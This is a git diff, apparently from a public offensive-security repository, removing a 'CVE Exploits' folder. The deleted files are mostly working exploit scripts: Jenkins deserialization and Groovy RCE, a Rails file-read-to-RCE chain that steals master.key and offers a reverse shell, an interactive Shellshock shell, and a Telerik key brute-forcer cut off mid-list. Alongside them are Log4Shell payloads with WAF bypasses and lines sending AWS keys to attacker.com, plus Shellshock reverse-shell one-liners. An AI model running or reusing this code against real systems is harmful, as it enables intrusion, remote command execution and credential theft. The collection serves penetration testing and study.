73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x39\x74\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xf6\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x71\x00\x7e\x00\x1e\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x39\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x00\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x18\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x6c\x69\x45\x6e\x74\x72\x79\x50\x6f\x69\x6e\x74\x71\x00\x7e\x00\x24\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x74\x00\x1d\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x28\x31\x2c\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x29' - -sock.send(payload) -print('[+] Sent payload') diff --git a/CVE Exploits/Jenkins CVE-2016-0792.py b/CVE Exploits/Jenkins CVE-2016-0792.py deleted file mode 100644 index fdf4163..0000000 --- a/CVE Exploits/Jenkins CVE-2016-0792.py +++ /dev/null @@ -1,84 +0,0 @@ -#! /usr/bin/env python2 - -#Jenkins Groovy XML RCE (CVE-2016-0792) -#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins -#Made with <3 by @byt3bl33d3r - -from __future__ import print_function -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - -import argparse -import sys - -parser = argparse.ArgumentParser() -parser.add_argument('target', type=str, help='Target IP:PORT') -parser.add_argument('command', type=str, help='Command to run on target') -parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') - -if len(sys.argv) < 2: - parser.print_help() - sys.exit(1) - -args = parser.parse_args() - -if len(args.target.split(':')) != 2: - print('[-] Target must be in format IP:PORT') - sys.exit(1) - -if not args.command: - print('[-] You must specify a command to run') - sys.exit(1) - -ip, port = args.target.split(':') - -print('[*] Target IP: {}'.format(ip)) -print('[*] Target PORT: {}'.format(port)) - -xml_formatted = '' -command_list = args.command.split() -for cmd in command_list: - xml_formatted += '{:>16}{}\n'.format('', cmd) - -xml_payload = ''' - - - - - hashCode - - - - - {} - - false - - 0 - 0 - - 0 - start - - - - - 1 - -'''.format(xml_formatted.strip()) - -print('[*] Generated XML payload:') -print(xml_payload) -print() - -print('[*] Sending payload') -headers = {'Content-Type': 'text/xml'} -r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload) - -paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml'] -if r.status_code == 500: - for path in paths_in_trace: - if path in r.text: - print('[+] Command executed successfully') - break diff --git a/CVE Exploits/Jenkins Groovy Console.py b/CVE Exploits/Jenkins Groovy Console.py deleted file mode 100644 index 2c32fc9..0000000 --- a/CVE Exploits/Jenkins Groovy Console.py +++ /dev/null @@ -1,32 +0,0 @@ -#!/usr/bin/env python -# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py -# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b -from __future__ import print_function -from builtins import input -import requests -import sys - -print(""" -Jenkins Groovy Console cmd runner. - -usage: ./jgc.py [HOST] - -Then type any command and wait for STDOUT output from remote machine. -Type 'exit' to exit :) -""") -URL = sys.argv[1] + '/scriptText' -HEADERS = { - 'User-Agent': 'jgc' -} - -while 1: - CMD = input(">> Enter command to execute (or type 'exit' to exit): ") - if CMD == 'exit': - print("exiting...\n") - exit(0) - - DATA = { - 'script': 'println "{}".execute().text'.format(CMD) - } - result = requests.post(URL, headers=HEADERS, data=DATA) - print(result.text) \ No newline at end of file diff --git a/CVE Exploits/Log4Shell.md b/CVE Exploits/Log4Shell.md deleted file mode 100644 index 6ca8e89..0000000 --- a/CVE Exploits/Log4Shell.md +++ /dev/null @@ -1,105 +0,0 @@ -# CVE-2021-44228 Log4Shell - -> Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled - -## Summary - -* [Vulnerable code](#vulnerable-code) -* [Payloads](#payloads) -* [Scanning](#scanning) -* [WAF Bypass](#waf-bypass) -* [Exploitation](#exploitation) - * [Environment variables exfiltration](#environment-variables-exfiltration) - * [Remote Command Execution](#remote-command-execution) -* [References](#references) - -## Vulnerable code - -You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn]( -https://github.com/leonjza/log4jpwn) -```java -public String index(@RequestHeader("X-Api-Version") String apiVersion) { - logger.info("Received a request for API version " + apiVersion); - return "Hello, world!"; -} -``` - -## Payloads - -```bash -# Identify Java version and hostname -${jndi:ldap://${java:version}.domain/a} -${jndi:ldap://${env:JAVA_VERSION}.domain/a} -${jndi:ldap://${sys:java.version}.domain/a} -${jndi:ldap://${sys:java.vendor}.domain/a} -${jndi:ldap://${hostName}.domain/a} -${jndi:dns://${hostName}.domain} - -# More enumerations keywords and variables -java:os -docker:containerId -web:rootDir -bundle:config:db.password -``` - -## Scanning - -* [log4j-scan](https://github.com/fullhunt/log4j-scan) - ```powershell - usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] - [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] - python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test - python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass - ``` -* [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml) - - -## WAF Bypass - -```powershell -${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a} - -# using lower and upper -${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc} -${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc} -${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} - -# using env to create the letter -${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} -${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} -``` - -## Exploitation - -### Environment variables exfiltration - -```powershell -${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/ - -# AWS Access Key -${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY} -``` - - -### Remote Command Execution - -* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi) - ```ps1 - java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21" - Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference - Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference - Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat - Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy - Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1 - Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1 - Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2 - Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2 - ``` -* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit) - - -## References - -* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day/) -* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/) -* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/) \ No newline at end of file diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md deleted file mode 100644 index 1ea0374..0000000 --- a/CVE Exploits/README.md +++ /dev/null @@ -1,71 +0,0 @@ -# Common Vulnerabilities and Exposures - -## Tools - -- [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve) -- [Nuclei Templates - Community curated list of templates for the nuclei engine to find security vulnerabilities in applications](https://github.com/projectdiscovery/nuclei-templates) -- [Metasploit Framework](https://github.com/rapid7/metasploit-framework) -- [CVE Details - The ultimate security vulnerability datasource](https://www.cvedetails.com) - - -## Big CVEs in the last 5 years. - -### CVE-2017-0144 - EternalBlue - -EternalBlue exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer. - -Afftected systems: -- Windows Vista SP2 -- Windows Server 2008 SP2 and R2 SP1 -- Windows 7 SP1 -- Windows 8.1 -- Windows Server 2012 Gold and R2 -- Windows RT 8.1 -- Windows 10 Gold, 1511, and 1607 -- Windows Server 2016 - -### CVE-2017-5638 - Apache Struts 2 - -On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header. - -### CVE-2018-7600 - Drupalgeddon 2 - -A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. - -### CVE-2019-0708 - BlueKeep - -A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. - -### CVE-2019-19781 - Citrix ADC Netscaler - -A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution. - -Affected products: -- Citrix ADC and Citrix Gateway version 13.0 all supported builds -- Citrix ADC and NetScaler Gateway version 12.1 all supported builds -- Citrix ADC and NetScaler Gateway version 12.0 all supported builds -- Citrix ADC and NetScaler Gateway version 11.1 all supported builds -- Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds - -## Older, but not forgotten - -### CVE-2014-0160 - Heartbleed - -The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). - -### CVE-2014-6271 - Shellshock - -Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. - -```powershell -echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n" -curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" -``` - -## Thanks to - -* [Heartbleed - Official website](http://heartbleed.com) -* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug)) -* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/) -* [EternalBlue - Wikipedia](https://en.wikipedia.org/wiki/EternalBlue) -* [BlueKeep - Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708) diff --git a/CVE Exploits/Rails CVE-2019-5420.rb b/CVE Exploits/Rails CVE-2019-5420.rb deleted file mode 100644 index 647f03f..0000000 --- a/CVE Exploits/Rails CVE-2019-5420.rb +++ /dev/null @@ -1,156 +0,0 @@ -require 'erb' -require "./demo-5.2.1/config/environment" -require "base64" -require 'net/http' - -$proxy_addr = '127.0.0.1' -$proxy_port = 8080 - -$remote = "http://172.18.0.3:3000" -$ressource = "/demo" - -puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n" - -print "[+] Checking if vulnerable to CVE-2019-5418 => " -uri = URI($remote + $ressource) -req = Net::HTTP::Get.new(uri) -req['Accept'] = "../../../../../../../../../../etc/passwd{{" -res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| - http.request(req) -} -if res.body.include? "root:x:0:0:root:" - puts "\033[92mOK\033[0m" -else - puts "KO" - abort -end - -print "[+] Getting file => credentials.yml.enc => " -path = "../../../../../../../../../../config/credentials.yml.enc{{" -for $i in 0..9 - uri = URI($remote + $ressource) - req = Net::HTTP::Get.new(uri) - req['Accept'] = path[3..57] - res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| - http.request(req) - } - if res.code == "200" - puts "\033[92mOK\033[0m" - File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) } - break - end - path = path[3..57] - $i +=1; -end - -print "[+] Getting file => master.key => " -path = "../../../../../../../../../../config/master.key{{" -for $i in 0..9 - uri = URI($remote + $ressource) - req = Net::HTTP::Get.new(uri) - req['Accept'] = path[3..57] - res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| - http.request(req) - } - if res.code == "200" - puts "\033[92mOK\033[0m" - File.open("master.key", 'w') { |file| file.write(res.body) } - break - end - path = path[3..57] - $i +=1; -end - -print "[+] Decrypt secret_key_base => " -credentials_config_path = File.join("../", "credentials.yml.enc") -credentials_key_path = File.join("../", "master.key") -ENV["RAILS_MASTER_KEY"] = res.body -credentials = ActiveSupport::EncryptedConfiguration.new( - config_path: Rails.root.join(credentials_config_path), - key_path: Rails.root.join(credentials_key_path), - env_key: "RAILS_MASTER_KEY", - raise_if_missing_key: true -) -if credentials.secret_key_base != nil - puts "\033[92mOK\033[0m" - puts "" - puts "secret_key_base": credentials.secret_key_base - puts "" -end - -puts "[+] Getting reflective command (R) or reverse shell (S) => " -loop do - begin - input = [(print 'Select option R or S: '), gets.rstrip][1] - if input == "R" - puts "Reflective command selected" - command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1] - elsif input == "S" - puts "Reverse shell selected" - command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1] - else - puts "No option selected" - abort - end - - command_b64 = Base64.encode64(command) - - print "[+] Generating payload CVE-2019-5420 => " - secret_key_base = credentials.secret_key_base - key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000)) - secret = key_generator.generate_key("ActiveStorage") - verifier = ActiveSupport::MessageVerifier.new(secret) - if input == "R" - code = "system('bash','-c','" + command + " > /tmp/result.txt')" - else - code = "system('bash','-c','" + command + "')" - end - erb = ERB.allocate - erb.instance_variable_set :@src, code - erb.instance_variable_set :@filename, "1" - erb.instance_variable_set :@lineno, 1 - dump_target = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result - - puts "\033[92mOK\033[0m" - puts "" - url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test" - puts url - puts "" - - print "[+] Sending request => " - uri = URI(url) - req = Net::HTTP::Get.new(uri) - req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" - res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| - http.request(req) - } - if res.code == "500" - puts "\033[92mOK\033[0m" - else - puts "KO" - abort - end - - if input == "R" - print "[+] Getting result of command => " - uri = URI($remote + $ressource) - req = Net::HTTP::Get.new(uri) - req['Accept'] = "../../../../../../../../../../tmp/result.txt{{" - res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| - http.request(req) - } - if res.code == "200" - puts "\033[92mOK\033[0m\n\n" - puts res.body - puts "\n" - else - puts "KO" - abort - end - end - - rescue Exception => e - puts "Exiting..." - abort - end -end diff --git a/CVE Exploits/Shellshock CVE-2014-6271.py b/CVE Exploits/Shellshock CVE-2014-6271.py deleted file mode 100644 index 3246c80..0000000 --- a/CVE Exploits/Shellshock CVE-2014-6271.py +++ /dev/null @@ -1,36 +0,0 @@ -#!/usr/bin/python - -# Successful Output: -# # python shell_shocker.py -# [+] Attempting Shell_Shock - Make sure to type full path -# ~$ /bin/ls / -# bin -# boot -# dev -# etc -# .. -# ~$ /bin/cat /etc/passwd - -from __future__ import print_function -from future import standard_library -standard_library.install_aliases() -from builtins import input -import sys, urllib.request, urllib.error, urllib.parse - -if len(sys.argv) != 2: - print("Usage: shell_shocker ") - sys.exit(0) - -URL=sys.argv[1] -print("[+] Attempting Shell_Shock - Make sure to type full path") - -while True: - command=input("~$ ") - opener=urllib.request.build_opener() - opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)] - try: - response=opener.open(URL) - for line in response.readlines(): - print(line.strip()) - except Exception as e: print(e) - diff --git a/CVE Exploits/Telerik CVE-2017-9248.py b/CVE Exploits/Telerik CVE-2017-9248.py deleted file mode 100644 index 330c887..0000000 --- a/CVE Exploits/Telerik CVE-2017-9248.py +++ /dev/null @@ -1,362 +0,0 @@ -# Author: Paul Taylor / @bao7uo - -# https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py - -# dp_crypto - CVE-2017-9248 exploit -# Telerik.Web.UI.dll Cryptographic compromise - -# Warning - no cert warnings, -# and verify = False in code below prevents verification - -import sys -import base64 -import requests -import re -import binascii -import argparse - -from requests.packages.urllib3.exceptions import InsecureRequestWarning - -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - -requests_sent = 0 -char_requests = 0 - - -def getProxy(proxy): - return { "http" : proxy, "https" : proxy } - - -def get_result(plaintext, key, session, pad_chars): - global requests_sent, char_requests - - url = args.url - base_pad = (len(key) % 4) - base = '' if base_pad == 0 else pad_chars[0:4 - base_pad] - dp_encrypted = base64.b64encode( - (encrypt(plaintext, key) + base).encode() - ).decode() - request = requests.Request('GET', url + '?dp=' + dp_encrypted) - request = request.prepare() - response = session.send(request, verify=False, proxies = getProxy(args.proxy)) - requests_sent += 1 - char_requests += 1 - - match = re.search("(Error Message:)(.+\n*.+)()", response.text) - return True \ - if match is not None \ - and match.group(2) == args.oracle \ - else False - -def test_keychar(keychar, found, session, pad_chars): - base64chars = [ - "A", "Q", "g", "w", "B", "R", "h", "x", "C", "S", "i", "y", - "D", "T", "j", "z", "E", "U", "k", "0", "F", "V", "l", "1", - "G", "W", "m", "2", "H", "X", "n", "3", "I", "Y", "o", "4", - "J", "Z", "p", "5", "K", "a", "q", "6", "L", "b", "r", "7", - "M", "c", "s", "8", "N", "d", "t", "9", "O", "e", "u", "+", - "P", "f", "v", "/" - ] - - duff = False - accuracy_thoroughness_threshold = args.accuracy - for bc in range(int(accuracy_thoroughness_threshold)): - # ^^ max is len(base64chars) - sys.stdout.write("\b\b" + base64chars[bc] + "]") - sys.stdout.flush() - if not get_result( - base64chars[0] * len(found) + base64chars[bc], - found + keychar, session, pad_chars - ): - duff = True - break - return False if duff else True - - -def encrypt(dpdata, key): - encrypted = [] - k = 0 - for i in range(len(dpdata)): - encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k]))) - k = 0 if k >= len(key) - 1 else k + 1 - return ''.join(str(e) for e in encrypted) - - -def mode_decrypt(): - ciphertext = base64.b64decode(args.ciphertext).decode() - key = args.key - print(base64.b64decode(encrypt(ciphertext, key)).decode()) - print("") - - -def mode_encrypt(): - plaintext = args.plaintext - key = args.key - - plaintext = base64.b64encode(plaintext.encode()).decode() - print(base64.b64encode(encrypt(plaintext, key).encode()).decode()) - print("") - - -def test_keypos(key_charset, unprintable, found, session): - pad_chars = '' - for pad_char in range(256): - pad_chars += chr(pad_char) - - for i in range(len(pad_chars)): - for k in range(len(key_charset)): - keychar = key_charset[k] - sys.stdout.write("\b"*6) - sys.stdout.write( - ( - keychar - if unprintable is False - else '+' - ) + - ") [" + ( - keychar - if unprintable is False - else '+' - ) + - "]" - ) - sys.stdout.flush() - if test_keychar(keychar, found, session, pad_chars[i] * 3): - return keychar - return False - - -def get_key(session): - global char_requests - found = '' - unprintable = False - - key_length = args.key_len - key_charset = args.charset - if key_charset == 'all': - unprintable = True - key_charset = '' - for i in range(256): - key_charset += chr(i) - else: - if key_charset == 'hex': - key_charset = '01234567890ABCDEF' - - print("Attacking " + args.url) - print( - "to find key of length [" + - str(key_length) + - "] with accuracy threshold [" + - str(args.accuracy) + - "]" - ) - print( - "using key charset [" + - ( - key_charset - if unprintable is False - else '- all ASCII -' - ) + - "]\n" - ) - for i in range(int(key_length)): - pos_str = ( - str(i + 1) - if i > 8 - else "0" + str(i + 1) - ) - sys.stdout.write("Key position " + pos_str + ": (------") - sys.stdout.flush() - keychar = test_keypos(key_charset, unprintable, found, session) - if keychar is not False: - found = found + keychar - sys.stdout.write( - "\b"*7 + "{" + - ( - keychar - if unprintable is False - else '0x' + binascii.hexlify(keychar.encode()).decode() - ) + - "} found with " + - str(char_requests) + - " requests, total so far: " + - str(requests_sent) + - "\n" - ) - sys.stdout.flush() - char_requests = 0 - else: - sys.stdout.write("\b"*7 + "Not found, quitting\n") - sys.stdout.flush() - break - if keychar is not False: - print("Found key: " + - ( - found - if unprintable is False - else "(hex) " + binascii.hexlify(found.encode()).decode() - ) - ) - print("Total web requests: " + str(requests_sent)) - return found - - -def mode_brutekey(): - session = requests.Session() - found = get_key(session) - - if found == '': - return - else: - urls = {} - url_path = args.url - params = ( - '?DialogName=DocumentManager' + - '&renderMode=2' + - '&Skin=Default' + - '&Title=Document%20Manager' + - '&dpptn=' + - '&isRtl=false' + - '&dp=' - ) - versions = [ - '2007.1423', '2007.1521', '2007.1626', '2007.2918', - '2007.21010', '2007.21107', '2007.31218', '2007.31314', - '2007.31425', '2008.1415', '2008.1515', '2008.1619', - '2008.2723', '2008.2826', '2008.21001', '2008.31105', - '2008.31125', '2008.31314', '2009.1311', '2009.1402', - '2009.1527', '2009.2701', '2009.2826', '2009.31103', - '2009.31208', '2009.31314', '2010.1309', '2010.1415', - '2010.1519', '2010.2713', '2010.2826', '2010.2929', - '2010.31109', '2010.31215', '2010.31317', '2011.1315', - '2011.1413', '2011.1519', '2011.2712', '2011.2915', - '2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411', - '2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016', - '2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403', - '2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015', - '2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403', - '2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204', - '2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623', - '2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111', - '2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607', - '2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118', - '2017.1.228', 